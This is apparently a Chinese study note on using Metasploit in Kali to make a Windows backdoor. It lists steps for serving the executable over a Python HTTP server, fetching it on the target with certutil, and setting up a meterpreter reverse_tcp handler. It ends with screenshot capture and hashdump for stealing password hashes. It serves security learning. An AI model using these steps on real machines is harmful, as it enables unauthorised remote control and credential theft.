Kali之metasploit学习

**目标:**尝试使用metasploit制作一个windows 后门(exe文件)

一:使用metasploit生成一个exe安装包。

二、将对应的可执行文件放入到目标机

python3 -m http.server 端口号: 模块化启动一个端口。

**windows 证书管理工具:**certutil ,可以使用它来下载文件。

**例如:**certutil -urlcache -split -f http://目标ip地址:端口号

三、开启metasploit监听msfconsole

msf 的使用法则:

1.使用模块 use

2. 配置模块必选项:set

3.运行模块:run

具体实践步骤如下:

  1. 输入msfconsole进入msf6命令行

2.使用模块 并设置相关参数

bash 复制代码
# 使用 攻击/多重/句柄 
use exploit/multi/handler  

# 和之前生成exe文件的保持一致
# 设置payload
set payload windows/x64/meterpreter/reverse_tcp

# 设置ip 
set lhost 192.168.*.*

# 设置端口
set lport 9000

3.运行run

四、尝试获取目标机(windows)信息

截图命令:screenshot

密码:hashdump (当密码超过8位,且有多种元素,就无法破解了)

相关推荐
啊我不会诶1 小时前
倍增法和ST算法 个人学习笔记&代码
笔记·学习·算法
aha-凯心2 小时前
前端学习 vben 之 axios interceptors
前端·学习
许白掰3 小时前
Linux入门篇学习——Linux 编写第一个自己的命令
linux·运维·数据库·嵌入式硬件·学习
生如夏花℡3 小时前
HarmonyOS学习记录4
学习·华为·harmonyos
彤银浦3 小时前
Web学习笔记2
笔记·学习
长风破浪会有时呀3 小时前
Git 学习笔记
笔记·git·学习
偷偷的卷3 小时前
【算法笔记 day three】滑动窗口(其他类型)
数据结构·笔记·python·学习·算法·leetcode
大白的编程日记.4 小时前
【计算机基础理论知识】C++篇(二)
开发语言·c++·学习
Chef_Chen4 小时前
从0开始学习R语言--Day42--LM检验
学习
C语言小火车4 小时前
野指针:C/C++内存管理的“幽灵陷阱”与系统化规避策略
c语言·c++·学习·指针